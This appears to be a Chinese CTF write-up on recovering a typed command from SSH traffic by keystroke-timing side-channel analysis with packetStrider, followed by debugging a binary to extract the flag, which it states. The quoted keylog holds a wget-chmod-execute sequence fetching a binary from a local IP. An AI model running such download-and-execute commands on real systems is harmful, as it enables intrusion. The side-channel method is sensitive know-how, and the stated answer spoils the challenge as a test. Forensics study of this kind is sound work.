题目在比赛时0解,第二天的虎符出了道加强版,给了hint和ssh侧信道相关,可以找到一篇2020上交校赛的wp,里面有道几乎一模一样的题
本题最开始的步骤和文章中的完全相同,用文章中提到的工具分析这个ssh流量包
python3 packetStrider-ssh.py -f babytraffic.pcap -k -p -o out
可以得到键盘的按键分析
Detailed Events:
┃ packet time(s) delta(s) Direction Indicator Bytes Notes
┃ -----------------------------------------------------------------------
┃ 0 0 0 packet0 packet0 40
┃ 5 0.088 0.088 forward key offered 364
┃ 6 2.949 2.861 forward key accepted 16 Delta suggests hostkey was NOT in known_hosts, user manually accepted it
┃ 10 3.006 0.056 forward login prompt 52
┃ 11 3.048 0.042 forward login failure 372 Delta suggests Certificate Auth, pwd to cert null or non interactive
┃ 12 3.049 0.001 forward login prompt 52
┃ 13 7.25 4.201 forward login success 84 < 8 char Password, entered interactively by human
┃ 20 7.774 0.524 forward agent fwding 520 !! -A option used. Client private key sharing via SSH Agent Forwarding
┃ 23 9.708 1.933 forward keystroke 36
┃ 25 10.117 0.41 forward keystroke 36
┃ 27 10.936 0.819 forward keystroke 36
┃ 29 11.961 1.025 forward keystroke 36
┃ 31 12.781 0.82 forward keystroke 36
┃ 33 13.803 1.023 forward keystroke 36
┃ 35 14.521 0.717 forward keystroke 36
┃ 37 15.237 0.716 forward keystroke 36
┃ 39 16.057 0.821 forward keystroke 36
┃ 41 17.094 1.036 forward keystroke 36
┃ 43 18.104 1.011 forward keystroke 36
┃ 45 18.83 0.726 forward keystroke 36
┃ 47 19.846 1.016 forward keystroke 36
┃ 49 20.561 0.715 forward keystroke 36
┃ 51 21.381 0.82 forward keystroke 36
┃ 53 21.792 0.412 forward keystroke 36
┃ 55 22.813 1.021 forward keystroke 36
┃ 57 23.838 1.025 forward keystroke 36
┃ 59 24.862 1.024 forward keystroke 36
┃ 61 25.891 1.028 forward keystroke 36
┃ 63 26.91 1.019 forward keystroke 36
┃ 65 27.934 1.024 forward keystroke 36
┃ 67 29.571 1.637 forward keystroke 36
┃ 69 31.63 2.059 forward keystroke 36
┃ 71 32.336 0.707 forward keystroke 36
┃ 73 33.054 0.718 forward keystroke 36
┃ 75 33.872 0.817 forward keystroke 36
┃ 77 34.589 0.717 forward keystroke 36
┃ 79 35.612 1.023 forward keystroke 36
┃ 81 36.739 1.127 forward keystroke 36
┃ 83 37.456 0.717 forward keystroke 36
┃ 85 38.173 0.718 forward keystroke 36
┃ 87 38.89 0.717 forward keystroke 36
┃ 97 40.527 1.637 forward _┃ ENTER 1012
┃ 98 41.66 1.132 forward keystroke 36
┃ 100 42.37 0.711 forward keystroke 36
┃ 102 43.191 0.82 forward keystroke 36
┃ 104 43.907 0.716 forward keystroke 36
┃ 106 44.52 0.614 forward keystroke 36
┃ 108 45.238 0.718 forward keystroke 36
┃ 110 46.261 1.023 forward keystroke 36
┃ 112 47.388 1.127 forward keystroke 36
┃ 114 48.728 1.339 forward keystroke 36
┃ 116 49.845 1.117 forward keystroke 36
┃ 118 50.255 0.409 forward keystroke 36
┃ 120 50.977 0.722 forward keystroke 36
┃ 122 51.69 0.714 forward keystroke 36
┃ 126 52.507 0.817 forward _┃ ENTER 100
┃ 127 53.84 1.333 forward keystroke 36
┃ 129 55.477 1.637 forward keystroke 36
┃ 131 56.194 0.717 forward keystroke 36
┃ 133 56.604 0.41 forward keystroke 36
┃ 135 57.323 0.719 forward keystroke 36
┃ 137 57.936 0.613 forward keystroke 36
┃ 139 58.959 1.023 forward keystroke 36
┃ 141 60.292 1.333 forward keystroke 36
┃ 143 61.006 0.714 forward keystroke 36
┃ 145 61.725 0.719 forward keystroke 36
┃ 147 62.441 0.716 forward keystroke 36
┃ 149 67.457 5.016 forward < delete/ac 36
┃ 151 67.871 0.414 forward < delete/ac 36
┃ 153 70.12 2.249 forward keystroke 36
┃ 155 72.372 2.251 forward keystroke 36
┃ 157 75.648 3.277 forward < delete/ac 36
┃ 159 76.98 1.332 forward keystroke 36
┃ 161 79.027 2.047 forward keystroke 36
┃ 163 81.588 2.561 forward keystroke 36
┃ 165 83.636 2.048 forward keystroke 36
┃ 167 86.616 2.981 forward keystroke 36
┃ 169 92.251 5.635 forward < delete/ac 36
┃ 171 94.488 2.237 forward keystroke 36
┃ 173 95.512 1.024 forward keystroke 36
┃ 175 97.458 1.946 forward keystroke 36
┃ 177 98.789 1.331 forward keystroke 36
┃ 179 101.144 2.356 forward < delete/ac 36
┃ 181 103.706 2.562 forward keystroke 36
┃ 183 105.444 1.738 forward keystroke 36
┃ 185 107.697 2.253 forward keystroke 36
┃ 187 109.341 1.644 forward keystroke 36
┃ 189 111.691 2.35 forward keystroke 36
┃ 191 113.329 1.638 forward keystroke 36
┃ 193 115.687 2.359 forward < delete/ac 36
┃ 195 118.244 2.556 forward keystroke 36
┃ 197 119.885 1.641 forward keystroke 36
┃ 199 121.827 1.942 forward keystroke 36
┃ 201 123.261 1.433 forward keystroke 36
┃ 203 125.943 2.683 forward keystroke 36
┃ 205 127.971 2.027 forward keystroke 36
┃ 207 129.507 1.536 forward keystroke 36
┃ 209 130.941 1.434 forward keystroke 36
┃ 211 133.808 2.867 forward < delete/ac 36
┃ 213 134.831 1.023 forward < delete/ac 36
┃ 215 137.186 2.355 forward keystroke 36
┃ 217 139.132 1.945 forward keystroke 36
┃ 219 141.487 2.355 forward < delete/ac 36
┃ 221 143.433 1.946 forward keystroke 36
┃ 223 145.07 1.637 forward keystroke 36
┃ 225 146.402 1.332 forward keystroke 36
┃ 227 149.268 2.866 forward keystroke 36
┃ 229 150.292 1.024 forward keystroke 36
┃ 231 151.637 1.345 forward keystroke 36
┃ 233 154.184 2.547 forward < delete/ac 36
┃ 235 155.822 1.638 forward < delete/ac 36
┃ 237 157.869 2.048 forward keystroke 36
┃ 239 159.201 1.331 forward keystroke 36
┃ 241 161.453 2.253 forward keystroke 36
┃ 243 164.117 2.663 forward keystroke 36
┃ 245 165.139 1.022 forward keystroke 36
┃ 247 166.778 1.638 forward keystroke 36
┃ 249 167.808 1.03 forward < delete/ac 36
┃ 251 169.133 1.325 forward < delete/ac 36
┃ 253 172.307 3.175 forward keystroke 36
┃ 255 173.74 1.433 forward keystroke 36
┃ 259 175.584 1.844 forward _┃ ENTER 100
其中:keystroke
表示正常按键,_┃ ENTER
表示输入回车,< delete/ac
表示删除前一个字符
结合题目附件中给出的 keylog.txt
wget http://192.168.1.5:9999/bash
chmod +x bash
./bash dsz al1SkZnNE7903oI2fjFuPAqteT5e5bxchCtMhmmLm
对照按键输入信息,很显然可以看到 keylog.txt 中前两行只进行了正常的输入,并没有任何修改,直到第三行开始才有了删除操作,逐字比对按键信息,可以还原出最终的第三行信息
./bash dsa1SkZNE703oI2jFuPAqTe5bxCtMhLm
但是正常执行此语句并不会得到flag,需要进行动调,用 ida 和 gdb 都可
首先可以用 ida 分析一下这个 bash 文件,可以在 main 函数中看到关于我们输入的参数 a2 的相关操作
有关 main 函数的参数: int main(int argc, char** argv)
以本题为例:./bash dsa1SkZNE703oI2jFuPAqTe5bxCtMhLm
argv[0] 的内容为 "bash",argv[1] 的内容为 "dsa1SkZNE703oI2jFuPAqTe5bxCtMhLm"
在 main 函数中有两个函数,其中第一个函数的参数中涉及了 a2[1],但是我们进入函数查看可以发现并没有对 a2[1] 进行实际的操作,那么接下来看第二个函数,可以在第二个函数的最后看到一系列对 a2 进行操作的代码
并且最终返回了 result,而 a2 又对应着 rsi 寄存器,那么我们在最后 return result
处下个断点,动调一下,再查看 rsi 寄存器的内容
可以看到 rsi 的内容已经变成了一个奇怪的字符串:xY4lqpkaNTui1s98
,这就是本题的flag
用 gdb 也可以进行调试,但需要先设置参数,而且还要算一下相对于程序基址的偏移,再在对应的位置处下断点,即可看到 rsi 的内容
set args dsa1SkZNE703oI2jFuPAqTe5bxCtMhLm
xY4lqpkaNTui1s98